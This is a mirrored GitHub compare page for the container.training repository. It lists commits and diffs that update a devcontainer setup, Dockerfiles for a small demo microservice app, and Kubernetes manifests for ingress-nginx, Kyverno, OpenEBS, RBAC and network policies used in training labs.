mirror of
https://github.com/jpetazzo/container.training.git
synced 2026-02-16 02:29:57 +00:00
Compare commits
344 Commits
2022-07-pr
...
main
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
8ba96380b7 | ||
|
|
4311a09ccd | ||
|
|
feb0a8cdb9 | ||
|
|
302924db40 | ||
|
|
4c2a7c6696 | ||
|
|
a1f75a4e74 | ||
|
|
8dd674ec4b | ||
|
|
93ad45da9b | ||
|
|
01b2456e03 | ||
|
|
942f20812b | ||
|
|
a44701960c | ||
|
|
34f3976777 | ||
|
|
ba376feb10 | ||
|
|
e8e2123457 | ||
|
|
f9d73c0a1e | ||
|
|
5ec84efa50 | ||
|
|
bd36e965ee | ||
|
|
17eb4efa3b | ||
|
|
c5c0f80b01 | ||
|
|
aa815a53fc | ||
|
|
0beaf2f1f2 | ||
|
|
cf3ce21eec | ||
|
|
66dadf3c60 | ||
|
|
80476c8323 | ||
|
|
a8797b1f80 | ||
|
|
890b76e119 | ||
|
|
570ec8b25e | ||
|
|
de1d7430fd | ||
|
|
bc97f8c38c | ||
|
|
1dea1acaa0 | ||
|
|
7e891faadd | ||
|
|
a1fa6221d8 | ||
|
|
c42c7db516 | ||
|
|
96ecb86f23 | ||
|
|
58255d47fa | ||
|
|
8ca2d2a4fb | ||
|
|
641e0ea98b | ||
|
|
356a0e814f | ||
|
|
2effd41ff0 | ||
|
|
af448c4540 | ||
|
|
9f0224bb26 | ||
|
|
39a71565a0 | ||
|
|
cbea696d2c | ||
|
|
46b56b90e2 | ||
|
|
6d0d394948 | ||
|
|
d6017b5d40 | ||
|
|
8b91bd6ef0 | ||
|
|
078e799666 | ||
|
|
f25abf663b | ||
|
|
6d8ae7132d | ||
|
|
404f816de6 | ||
|
|
b0a3460efa | ||
|
|
944db5f8ea | ||
|
|
e820ca466f | ||
|
|
d3c5bde6de | ||
|
|
b56e7bdb52 | ||
|
|
f98c77564f | ||
|
|
3d98d56bf8 | ||
|
|
25576a570f | ||
|
|
47fc74a21a | ||
|
|
d524cd73fa | ||
|
|
6b1fa88887 | ||
|
|
f37d8112f8 | ||
|
|
5005de823d | ||
|
|
de60cdbc7e | ||
|
|
605ee21b83 | ||
|
|
fd06364ab0 | ||
|
|
1be66f3513 | ||
|
|
3c142ad06d | ||
|
|
b291243472 | ||
|
|
ef7d4fcdaa | ||
|
|
0fd5499233 | ||
|
|
0e4d7df9fc | ||
|
|
9175a5c42a | ||
|
|
d090aec9f6 | ||
|
|
08c702423f | ||
|
|
5d5aad347b | ||
|
|
2390783cfd | ||
|
|
10fbfa135a | ||
|
|
64376c5ec2 | ||
|
|
b536318b03 | ||
|
|
2a8bbfb719 | ||
|
|
a3c2c92984 | ||
|
|
1062c519b8 | ||
|
|
bc0ac34f5b | ||
|
|
4896a91bd4 | ||
|
|
303dc93ac8 | ||
|
|
785d704726 | ||
|
|
cd346ecace | ||
|
|
4de3c303a6 | ||
|
|
121713a6c7 | ||
|
|
4431cfe68a | ||
|
|
dcf218dbe2 | ||
|
|
43ff815d9f | ||
|
|
92e61ef83b | ||
|
|
45770cc584 | ||
|
|
58700396f9 | ||
|
|
8783da014c | ||
|
|
f780100217 | ||
|
|
555cd058bb | ||
|
|
a05d1f9d4f | ||
|
|
84365d03c6 | ||
|
|
164bc01388 | ||
|
|
c07116bd29 | ||
|
|
c4057f9c35 | ||
|
|
f57bd9a072 | ||
|
|
fca6396540 | ||
|
|
28ee1115ae | ||
|
|
2d171594fb | ||
|
|
f825f98247 | ||
|
|
7a369b4bcd | ||
|
|
087a68c06d | ||
|
|
b163ad0934 | ||
|
|
a46476fb0d | ||
|
|
37baf22bf2 | ||
|
|
79631603c5 | ||
|
|
52e6569f47 | ||
|
|
6c71a38ddc | ||
|
|
c6507c1561 | ||
|
|
10a4fff91c | ||
|
|
91218b2b16 | ||
|
|
106912fcf8 | ||
|
|
9e712e8a9e | ||
|
|
cc4c096558 | ||
|
|
908ffe0dd2 | ||
|
|
0e7058214a | ||
|
|
21dad159de | ||
|
|
3ab190710f | ||
|
|
8ea09e93ee | ||
|
|
88fbb6f629 | ||
|
|
7ee8c00cfa | ||
|
|
7d35bacbbe | ||
|
|
cd81b5287b | ||
|
|
0abc67e974 | ||
|
|
7305bcfe12 | ||
|
|
0d1873145e | ||
|
|
6105b57914 | ||
|
|
8724ab2835 | ||
|
|
a669b15313 | ||
|
|
76067dca97 | ||
|
|
e665dad1b8 | ||
|
|
543204b905 | ||
|
|
c3b81baa06 | ||
|
|
41e5467063 | ||
|
|
96f03066f9 | ||
|
|
a3d543c6fe | ||
|
|
e573d520e9 | ||
|
|
e7b8337dd5 | ||
|
|
8b554c02d3 | ||
|
|
99348d8a2b | ||
|
|
1ea72f2179 | ||
|
|
ff7cbb2e19 | ||
|
|
5d65cf2ef6 | ||
|
|
3fb2c1e9d1 | ||
|
|
59a569e9e7 | ||
|
|
0b95eac799 | ||
|
|
ce13afa0d4 | ||
|
|
e97c93e451 | ||
|
|
3eb0378d13 | ||
|
|
f98192ac76 | ||
|
|
3488f5ad7b | ||
|
|
51f9b2db3b | ||
|
|
787be94cb6 | ||
|
|
86d4dfa775 | ||
|
|
c550ea6553 | ||
|
|
0d761409d7 | ||
|
|
ea16766fd7 | ||
|
|
e5d0e3ef85 | ||
|
|
81026d9d41 | ||
|
|
8788012880 | ||
|
|
ab6ed864e3 | ||
|
|
21f08cf3bd | ||
|
|
00b126ff20 | ||
|
|
d5b462653e | ||
|
|
560be57017 | ||
|
|
303cf459c4 | ||
|
|
2f009de2db | ||
|
|
06ca097b52 | ||
|
|
b4383156a5 | ||
|
|
624ec14763 | ||
|
|
a5e270b756 | ||
|
|
41330f8302 | ||
|
|
4fcd490b30 | ||
|
|
633c29b62c | ||
|
|
0802701f11 | ||
|
|
c407e178d5 | ||
|
|
cb574d7cdd | ||
|
|
84988644df | ||
|
|
3ab64d79e4 | ||
|
|
6391b4d896 | ||
|
|
57e8c6ee2f | ||
|
|
42443df0dc | ||
|
|
9289d453bc | ||
|
|
3d8059c631 | ||
|
|
7ff17fbabd | ||
|
|
dbfda8b458 | ||
|
|
c8fc67c995 | ||
|
|
28222db2e4 | ||
|
|
a38f930858 | ||
|
|
2cef200726 | ||
|
|
1f77a52137 | ||
|
|
b188e0f8a9 | ||
|
|
ac203a128d | ||
|
|
a9920e5cf0 | ||
|
|
d1047f950d | ||
|
|
e380509ffe | ||
|
|
b5c754211e | ||
|
|
cc57d983b2 | ||
|
|
fd86e6079d | ||
|
|
08f2e76082 | ||
|
|
db848767c1 | ||
|
|
c07f52c493 | ||
|
|
016c8fc863 | ||
|
|
b9bbccb346 | ||
|
|
311a2aaf32 | ||
|
|
a19585a587 | ||
|
|
354bd9542e | ||
|
|
0c73e91e6f | ||
|
|
23064b5d26 | ||
|
|
971314a84f | ||
|
|
c0689cc5df | ||
|
|
033873064a | ||
|
|
1ed3af6eff | ||
|
|
33ddfce3fa | ||
|
|
943783c8fb | ||
|
|
46b3aa23bf | ||
|
|
4498dc41a4 | ||
|
|
58de0d31f8 | ||
|
|
d32d986a9e | ||
|
|
fcb922628c | ||
|
|
77ceba7f5b | ||
|
|
ccb73fc872 | ||
|
|
bb302a25de | ||
|
|
e66b90eb4e | ||
|
|
74add4d435 | ||
|
|
5ee1367e79 | ||
|
|
c1f8177f4e | ||
|
|
d4a9ea2461 | ||
|
|
dd0f6d00fa | ||
|
|
79359e2abc | ||
|
|
9cd812de75 | ||
|
|
e29bfe7921 | ||
|
|
11bc78851b | ||
|
|
c611f55dca | ||
|
|
980bc66c3a | ||
|
|
fd0bc97a7a | ||
|
|
8f6c32e94a | ||
|
|
1a711f8c2c | ||
|
|
0080f21817 | ||
|
|
f937456232 | ||
|
|
8376aba5fd | ||
|
|
6d13122a4d | ||
|
|
8184c46ed3 | ||
|
|
0b900f9e5c | ||
|
|
e14d0d4ca4 | ||
|
|
cdb1e41524 | ||
|
|
600e7c441c | ||
|
|
81913d88a0 | ||
|
|
17d3d9a92a | ||
|
|
dd026b3db2 | ||
|
|
b9426af9cd | ||
|
|
aa4c0846ca | ||
|
|
abca33af29 | ||
|
|
f69a9d3eb8 | ||
|
|
bc10c5a5ca | ||
|
|
b6340acb6e | ||
|
|
f8ab4adfb7 | ||
|
|
dc8bd21062 | ||
|
|
c9710a9f70 | ||
|
|
bc1ba942c0 | ||
|
|
fa0a894ebc | ||
|
|
e78e0de377 | ||
|
|
cba2ff5ff7 | ||
|
|
d8f8bf6d87 | ||
|
|
84f131cdc5 | ||
|
|
8738f68a72 | ||
|
|
e130884184 | ||
|
|
74cb1aec85 | ||
|
|
70e60d7f4e | ||
|
|
29b3185e7e | ||
|
|
0616d74e37 | ||
|
|
676ebcdd3f | ||
|
|
28f0253242 | ||
|
|
73125b5ffb | ||
|
|
a90c521b77 | ||
|
|
bd141ddfc5 | ||
|
|
634d101efc | ||
|
|
20347a1417 | ||
|
|
893be3b18f | ||
|
|
dd6a1adc63 | ||
|
|
4dc60d3250 | ||
|
|
1aa0e062d0 | ||
|
|
cfbe578d4f | ||
|
|
1d692898da | ||
|
|
9526a94b77 | ||
|
|
e6eb157cc6 | ||
|
|
b984049603 | ||
|
|
c200c8e1da | ||
|
|
4c30e7db14 | ||
|
|
9d5a083473 | ||
|
|
a2be63e4c4 | ||
|
|
584dddd823 | ||
|
|
3e9307d420 | ||
|
|
5d3881b7e1 | ||
|
|
d57ba24f6f | ||
|
|
f046a32567 | ||
|
|
c2a169167d | ||
|
|
961cf34b6f | ||
|
|
b23cae8f5b | ||
|
|
a09c4ec4f5 | ||
|
|
527c63eee7 | ||
|
|
6cfe991375 | ||
|
|
c8f90463e0 | ||
|
|
316f5b8fd8 | ||
|
|
c86474a539 | ||
|
|
2943ef4e26 | ||
|
|
02004317ac | ||
|
|
c9cc659f88 | ||
|
|
bb8e655f92 | ||
|
|
50772ca439 | ||
|
|
1082204ac7 | ||
|
|
c9c79c409c | ||
|
|
71daf27237 | ||
|
|
986da15a22 | ||
|
|
407a8631ed | ||
|
|
b4a81a7054 | ||
|
|
d0f0d2c87b | ||
|
|
0f77eaa48b | ||
|
|
659713a697 | ||
|
|
20d21b742a | ||
|
|
747605357d | ||
|
|
17bb84d22e | ||
|
|
d343264b86 | ||
|
|
a216aa2034 | ||
|
|
64f993ff69 | ||
|
|
73b3cad0b8 | ||
|
|
26e5459fae | ||
|
|
9c564e6787 | ||
|
|
2724a611a6 | ||
|
|
2ca239ddfc | ||
|
|
e74a158c59 | ||
|
|
138af3b5d2 | ||
|
|
ad6d16bade | ||
|
|
1aaf9b0bd5 |
26
.devcontainer/devcontainer.json
Normal file
26
.devcontainer/devcontainer.json
Normal file
@@ -0,0 +1,26 @@
|
||||
{
|
||||
"name": "container.training environment to get started with Docker and/or Kubernetes",
|
||||
"image": "ghcr.io/jpetazzo/shpod",
|
||||
"features": {
|
||||
//"ghcr.io/devcontainers/features/common-utils:2": {}
|
||||
},
|
||||
|
||||
// Use 'forwardPorts' to make a list of ports inside the container available locally.
|
||||
"forwardPorts": [],
|
||||
|
||||
//"postCreateCommand": "... install extra packages...",
|
||||
"postStartCommand": "dind.sh ; kind.sh",
|
||||
|
||||
// This lets us use "docker-outside-docker".
|
||||
// Unfortunately, minikube, kind, etc. don't work very well that way;
|
||||
// so for now, we'll likely use "docker-in-docker" instead (with a
|
||||
// privilege dcontainer). But we're still exposing that socket in case
|
||||
// someone wants to do something interesting with it.
|
||||
"mounts": ["source=/var/run/docker.sock,target=/var/run/docker-host.sock,type=bind"],
|
||||
|
||||
// This is for docker-in-docker.
|
||||
"privileged": true,
|
||||
|
||||
// Uncomment to connect as root instead. More info: https://aka.ms/dev-containers-non-root.
|
||||
"remoteUser": "k8s"
|
||||
}
|
||||
23
.gitignore
vendored
23
.gitignore
vendored
@@ -2,23 +2,23 @@
|
||||
*.swp
|
||||
*~
|
||||
|
||||
prepare-vms/tags
|
||||
prepare-vms/infra
|
||||
prepare-vms/www
|
||||
|
||||
prepare-tf/.terraform*
|
||||
prepare-tf/terraform.*
|
||||
prepare-tf/stage2/*.tf
|
||||
prepare-tf/stage2/kubeconfig.*
|
||||
prepare-tf/stage2/.terraform*
|
||||
prepare-tf/stage2/terraform.*
|
||||
prepare-tf/stage2/externalips.*
|
||||
**/terraform.tfstate
|
||||
**/terraform.tfstate.backup
|
||||
prepare-labs/terraform/lab-environments
|
||||
prepare-labs/terraform/many-kubernetes/one-kubernetes-config/config.tf
|
||||
prepare-labs/terraform/many-kubernetes/one-kubernetes-module/*.tf
|
||||
prepare-labs/terraform/tags
|
||||
prepare-labs/terraform/virtual-machines/openstack/*.tfvars
|
||||
prepare-labs/terraform/virtual-machines/proxmox/*.tfvars
|
||||
prepare-labs/www
|
||||
|
||||
slides/*.yml.html
|
||||
slides/autopilot/state.yaml
|
||||
slides/index.html
|
||||
slides/past.html
|
||||
slides/slides.zip
|
||||
slides/_academy_*
|
||||
slides/fragments
|
||||
node_modules
|
||||
|
||||
### macOS ###
|
||||
@@ -32,3 +32,4 @@ node_modules
|
||||
Thumbs.db
|
||||
ehthumbs.db
|
||||
ehthumbs_vista.db
|
||||
|
||||
|
||||
@@ -1,26 +1,24 @@
|
||||
version: "2"
|
||||
|
||||
services:
|
||||
|
||||
rng:
|
||||
build: rng
|
||||
ports:
|
||||
- "8001:80"
|
||||
- "8001:80"
|
||||
|
||||
hasher:
|
||||
build: hasher
|
||||
ports:
|
||||
- "8002:80"
|
||||
- "8002:80"
|
||||
|
||||
webui:
|
||||
build: webui
|
||||
ports:
|
||||
- "8000:80"
|
||||
- "8000:80"
|
||||
volumes:
|
||||
- "./webui/files/:/files/"
|
||||
- "./webui/files/:/files/"
|
||||
|
||||
redis:
|
||||
image: redis
|
||||
|
||||
worker:
|
||||
build: worker
|
||||
|
||||
@@ -1,7 +1,8 @@
|
||||
FROM ruby:alpine
|
||||
WORKDIR /app
|
||||
RUN apk add --update build-base curl
|
||||
RUN gem install sinatra
|
||||
RUN gem install sinatra --version '~> 3'
|
||||
RUN gem install thin
|
||||
ADD hasher.rb /
|
||||
CMD ["ruby", "hasher.rb"]
|
||||
COPY hasher.rb .
|
||||
CMD ["ruby", "hasher.rb", "-o", "::"]
|
||||
EXPOSE 80
|
||||
|
||||
@@ -2,7 +2,6 @@ require 'digest'
|
||||
require 'sinatra'
|
||||
require 'socket'
|
||||
|
||||
set :bind, '0.0.0.0'
|
||||
set :port, 80
|
||||
|
||||
post '/' do
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
FROM python:alpine
|
||||
WORKDIR /app
|
||||
RUN pip install Flask
|
||||
COPY rng.py /
|
||||
CMD ["python", "rng.py"]
|
||||
COPY rng.py .
|
||||
ENV FLASK_APP=rng FLASK_RUN_HOST=:: FLASK_RUN_PORT=80
|
||||
CMD ["flask", "run", "--without-threads"]
|
||||
EXPOSE 80
|
||||
|
||||
@@ -28,5 +28,5 @@ def rng(how_many_bytes):
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
app.run(host="0.0.0.0", port=80, threaded=False)
|
||||
app.run(port=80)
|
||||
|
||||
|
||||
@@ -1,7 +1,8 @@
|
||||
FROM node:4-slim
|
||||
FROM node:23-alpine
|
||||
WORKDIR /app
|
||||
RUN npm install express
|
||||
RUN npm install redis@3
|
||||
COPY files/ /files/
|
||||
COPY webui.js /
|
||||
RUN npm install morgan
|
||||
RUN npm install redis@5
|
||||
COPY . .
|
||||
CMD ["node", "webui.js"]
|
||||
EXPOSE 80
|
||||
|
||||
@@ -1,26 +1,34 @@
|
||||
var express = require('express');
|
||||
var app = express();
|
||||
var redis = require('redis');
|
||||
import express from 'express';
|
||||
import morgan from 'morgan';
|
||||
import { createClient } from 'redis';
|
||||
|
||||
var client = redis.createClient(6379, 'redis');
|
||||
client.on("error", function (err) {
|
||||
console.error("Redis error", err);
|
||||
});
|
||||
var client = await createClient({
|
||||
url: "redis://redis",
|
||||
socket: {
|
||||
family: 0
|
||||
}
|
||||
})
|
||||
.on("error", function (err) {
|
||||
console.error("Redis error", err);
|
||||
})
|
||||
.connect();
|
||||
|
||||
var app = express();
|
||||
|
||||
app.use(morgan('common'));
|
||||
|
||||
app.get('/', function (req, res) {
|
||||
res.redirect('/index.html');
|
||||
});
|
||||
|
||||
app.get('/json', function (req, res) {
|
||||
client.hlen('wallet', function (err, coins) {
|
||||
client.get('hashes', function (err, hashes) {
|
||||
var now = Date.now() / 1000;
|
||||
res.json( {
|
||||
coins: coins,
|
||||
hashes: hashes,
|
||||
now: now
|
||||
});
|
||||
});
|
||||
app.get('/json', async(req, res) => {
|
||||
var coins = await client.hLen('wallet');
|
||||
var hashes = await client.get('hashes');
|
||||
var now = Date.now() / 1000;
|
||||
res.json({
|
||||
coins: coins,
|
||||
hashes: hashes,
|
||||
now: now
|
||||
});
|
||||
});
|
||||
|
||||
|
||||
@@ -1,5 +1,6 @@
|
||||
FROM python:alpine
|
||||
WORKDIR /app
|
||||
RUN pip install redis
|
||||
RUN pip install requests
|
||||
COPY worker.py /
|
||||
COPY worker.py .
|
||||
CMD ["python", "worker.py"]
|
||||
|
||||
9
k8s/M6-ingress-nginx-cm-patch.yaml
Normal file
9
k8s/M6-ingress-nginx-cm-patch.yaml
Normal file
@@ -0,0 +1,9 @@
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: ingress-nginx-controller
|
||||
namespace: ingress-nginx
|
||||
data:
|
||||
use-forwarded-headers: true
|
||||
compute-full-forwarded-for: true
|
||||
use-proxy-protocol: true
|
||||
10
k8s/M6-ingress-nginx-components.yaml
Normal file
10
k8s/M6-ingress-nginx-components.yaml
Normal file
@@ -0,0 +1,10 @@
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
labels:
|
||||
app.kubernetes.io/instance: flux-system
|
||||
app.kubernetes.io/part-of: flux
|
||||
app.kubernetes.io/version: v2.5.1
|
||||
pod-security.kubernetes.io/warn: restricted
|
||||
pod-security.kubernetes.io/warn-version: latest
|
||||
name: ingress-nginx
|
||||
12
k8s/M6-ingress-nginx-kustomization.yaml
Normal file
12
k8s/M6-ingress-nginx-kustomization.yaml
Normal file
@@ -0,0 +1,12 @@
|
||||
apiVersion: kustomize.config.k8s.io/v1beta1
|
||||
kind: Kustomization
|
||||
resources:
|
||||
- M6-ingress-nginx-components.yaml
|
||||
- sync.yaml
|
||||
patches:
|
||||
- path: M6-ingress-nginx-cm-patch.yaml
|
||||
target:
|
||||
kind: ConfigMap
|
||||
- path: M6-ingress-nginx-svc-patch.yaml
|
||||
target:
|
||||
kind: Service
|
||||
8
k8s/M6-ingress-nginx-svc-patch.yaml
Normal file
8
k8s/M6-ingress-nginx-svc-patch.yaml
Normal file
@@ -0,0 +1,8 @@
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: ingress-nginx-controller
|
||||
namespace: ingress-nginx
|
||||
annotations:
|
||||
service.beta.kubernetes.io/scw-loadbalancer-proxy-protocol-v2: true
|
||||
service.beta.kubernetes.io/scw-loadbalancer-use-hostname: true
|
||||
10
k8s/M6-kyverno-components.yaml
Normal file
10
k8s/M6-kyverno-components.yaml
Normal file
@@ -0,0 +1,10 @@
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
labels:
|
||||
app.kubernetes.io/instance: flux-system
|
||||
app.kubernetes.io/part-of: flux
|
||||
app.kubernetes.io/version: v2.5.1
|
||||
pod-security.kubernetes.io/warn: restricted
|
||||
pod-security.kubernetes.io/warn-version: latest
|
||||
name: kyverno
|
||||
72
k8s/M6-kyverno-enforce-service-account.yaml
Normal file
72
k8s/M6-kyverno-enforce-service-account.yaml
Normal file
@@ -0,0 +1,72 @@
|
||||
apiVersion: kyverno.io/v1
|
||||
kind: ClusterPolicy
|
||||
metadata:
|
||||
name: flux-multi-tenancy
|
||||
spec:
|
||||
validationFailureAction: enforce
|
||||
rules:
|
||||
- name: serviceAccountName
|
||||
exclude:
|
||||
resources:
|
||||
namespaces:
|
||||
- flux-system
|
||||
match:
|
||||
resources:
|
||||
kinds:
|
||||
- Kustomization
|
||||
- HelmRelease
|
||||
validate:
|
||||
message: ".spec.serviceAccountName is required"
|
||||
pattern:
|
||||
spec:
|
||||
serviceAccountName: "?*"
|
||||
- name: kustomizationSourceRefNamespace
|
||||
exclude:
|
||||
resources:
|
||||
namespaces:
|
||||
- flux-system
|
||||
- ingress-nginx
|
||||
- kyverno
|
||||
- monitoring
|
||||
- openebs
|
||||
match:
|
||||
resources:
|
||||
kinds:
|
||||
- Kustomization
|
||||
preconditions:
|
||||
any:
|
||||
- key: "{{request.object.spec.sourceRef.namespace}}"
|
||||
operator: NotEquals
|
||||
value: ""
|
||||
validate:
|
||||
message: "spec.sourceRef.namespace must be the same as metadata.namespace"
|
||||
deny:
|
||||
conditions:
|
||||
- key: "{{request.object.spec.sourceRef.namespace}}"
|
||||
operator: NotEquals
|
||||
value: "{{request.object.metadata.namespace}}"
|
||||
- name: helmReleaseSourceRefNamespace
|
||||
exclude:
|
||||
resources:
|
||||
namespaces:
|
||||
- flux-system
|
||||
- ingress-nginx
|
||||
- kyverno
|
||||
- monitoring
|
||||
- openebs
|
||||
match:
|
||||
resources:
|
||||
kinds:
|
||||
- HelmRelease
|
||||
preconditions:
|
||||
any:
|
||||
- key: "{{request.object.spec.chart.spec.sourceRef.namespace}}"
|
||||
operator: NotEquals
|
||||
value: ""
|
||||
validate:
|
||||
message: "spec.chart.spec.sourceRef.namespace must be the same as metadata.namespace"
|
||||
deny:
|
||||
conditions:
|
||||
- key: "{{request.object.spec.chart.spec.sourceRef.namespace}}"
|
||||
operator: NotEquals
|
||||
value: "{{request.object.metadata.namespace}}"
|
||||
29
k8s/M6-monitoring-components.yaml
Normal file
29
k8s/M6-monitoring-components.yaml
Normal file
@@ -0,0 +1,29 @@
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
labels:
|
||||
app.kubernetes.io/instance: flux-system
|
||||
app.kubernetes.io/part-of: flux
|
||||
app.kubernetes.io/version: v2.5.1
|
||||
pod-security.kubernetes.io/warn: restricted
|
||||
pod-security.kubernetes.io/warn-version: latest
|
||||
name: monitoring
|
||||
---
|
||||
apiVersion: networking.k8s.io/v1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: grafana
|
||||
namespace: monitoring
|
||||
spec:
|
||||
ingressClassName: nginx
|
||||
rules:
|
||||
- host: grafana.test.metal.mybestdomain.com
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
pathType: Prefix
|
||||
backend:
|
||||
service:
|
||||
name: kube-prometheus-stack-grafana
|
||||
port:
|
||||
number: 80
|
||||
35
k8s/M6-network-policies.yaml
Normal file
35
k8s/M6-network-policies.yaml
Normal file
@@ -0,0 +1,35 @@
|
||||
---
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: deny-from-other-namespaces
|
||||
spec:
|
||||
podSelector: {}
|
||||
ingress:
|
||||
- from:
|
||||
- podSelector: {}
|
||||
---
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: allow-webui
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
app: web
|
||||
ingress:
|
||||
- from: []
|
||||
---
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: allow-db
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
app: db
|
||||
ingress:
|
||||
- from:
|
||||
- podSelector:
|
||||
matchLabels:
|
||||
app: web
|
||||
10
k8s/M6-openebs-components.yaml
Normal file
10
k8s/M6-openebs-components.yaml
Normal file
@@ -0,0 +1,10 @@
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
labels:
|
||||
app.kubernetes.io/instance: flux-system
|
||||
app.kubernetes.io/part-of: flux
|
||||
app.kubernetes.io/version: v2.5.1
|
||||
pod-security.kubernetes.io/warn: restricted
|
||||
pod-security.kubernetes.io/warn-version: latest
|
||||
name: openebs
|
||||
12
k8s/M6-openebs-kustomization.yaml
Normal file
12
k8s/M6-openebs-kustomization.yaml
Normal file
@@ -0,0 +1,12 @@
|
||||
apiVersion: kustomize.config.k8s.io/v1beta1
|
||||
kind: Kustomization
|
||||
namespace: openebs
|
||||
resources:
|
||||
- M6-openebs-components.yaml
|
||||
- sync.yaml
|
||||
configMapGenerator:
|
||||
- name: openebs-values
|
||||
files:
|
||||
- values.yaml=M6-openebs-values.yaml
|
||||
configurations:
|
||||
- M6-openebs-kustomizeconfig.yaml
|
||||
6
k8s/M6-openebs-kustomizeconfig.yaml
Normal file
6
k8s/M6-openebs-kustomizeconfig.yaml
Normal file
@@ -0,0 +1,6 @@
|
||||
nameReference:
|
||||
- kind: ConfigMap
|
||||
version: v1
|
||||
fieldSpecs:
|
||||
- path: spec/valuesFrom/name
|
||||
kind: HelmRelease
|
||||
15
k8s/M6-openebs-values.yaml
Normal file
15
k8s/M6-openebs-values.yaml
Normal file
@@ -0,0 +1,15 @@
|
||||
# helm install openebs --namespace openebs openebs/openebs
|
||||
# --set engines.replicated.mayastor.enabled=false
|
||||
# --set lvm-localpv.lvmNode.kubeletDir=/var/lib/k0s/kubelet/
|
||||
# --create-namespace
|
||||
engines:
|
||||
replicated:
|
||||
mayastor:
|
||||
enabled: false
|
||||
# Needed for k0s install since kubelet install is slightly divergent from vanilla install >:-(
|
||||
lvm-localpv:
|
||||
lvmNode:
|
||||
kubeletDir: /var/lib/k0s/kubelet/
|
||||
localprovisioner:
|
||||
hostpathClass:
|
||||
isDefaultClass: true
|
||||
38
k8s/M6-rocky-cluster-role.yaml
Normal file
38
k8s/M6-rocky-cluster-role.yaml
Normal file
@@ -0,0 +1,38 @@
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
namespace: rocky-test
|
||||
name: rocky-full-access
|
||||
rules:
|
||||
- apiGroups: ["", extensions, apps]
|
||||
resources: [deployments, replicasets, pods, services, ingresses, statefulsets]
|
||||
verbs: [get, list, watch, create, update, patch, delete] # You can also use [*]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: rocky-pv-access
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources: [persistentvolumes]
|
||||
verbs: [get, list, watch, create, patch]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
labels:
|
||||
toolkit.fluxcd.io/tenant: rocky
|
||||
name: rocky-reconciler2
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: rocky-pv-access
|
||||
subjects:
|
||||
- apiGroup: rbac.authorization.k8s.io
|
||||
kind: User
|
||||
name: gotk:rocky-test:reconciler
|
||||
- kind: ServiceAccount
|
||||
name: rocky
|
||||
namespace: rocky-test
|
||||
|
||||
19
k8s/M6-rocky-ingress.yaml
Normal file
19
k8s/M6-rocky-ingress.yaml
Normal file
@@ -0,0 +1,19 @@
|
||||
apiVersion: networking.k8s.io/v1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: rocky
|
||||
namespace: rocky-test
|
||||
spec:
|
||||
ingressClassName: nginx
|
||||
rules:
|
||||
- host: rocky.test.mybestdomain.com
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
pathType: Prefix
|
||||
backend:
|
||||
service:
|
||||
name: web
|
||||
port:
|
||||
number: 80
|
||||
|
||||
8
k8s/M6-rocky-test-kustomization.yaml
Normal file
8
k8s/M6-rocky-test-kustomization.yaml
Normal file
@@ -0,0 +1,8 @@
|
||||
apiVersion: kustomize.config.k8s.io/v1beta1
|
||||
kind: Kustomization
|
||||
resources:
|
||||
- ../../base/rocky
|
||||
patches:
|
||||
- path: M6-rocky-test-patch.yaml
|
||||
target:
|
||||
kind: Kustomization
|
||||
7
k8s/M6-rocky-test-patch.yaml
Normal file
7
k8s/M6-rocky-test-patch.yaml
Normal file
@@ -0,0 +1,7 @@
|
||||
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
|
||||
kind: Kustomization
|
||||
metadata:
|
||||
name: rocky
|
||||
namespace: rocky-test
|
||||
spec:
|
||||
path: ./k8s/plain
|
||||
33
k8s/blue.yaml
Normal file
33
k8s/blue.yaml
Normal file
@@ -0,0 +1,33 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: blue
|
||||
name: blue
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: blue
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: blue
|
||||
spec:
|
||||
containers:
|
||||
- image: jpetazzo/color
|
||||
name: color
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: blue
|
||||
name: blue
|
||||
spec:
|
||||
ports:
|
||||
- name: "80"
|
||||
port: 80
|
||||
selector:
|
||||
app: blue
|
||||
@@ -17,8 +17,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
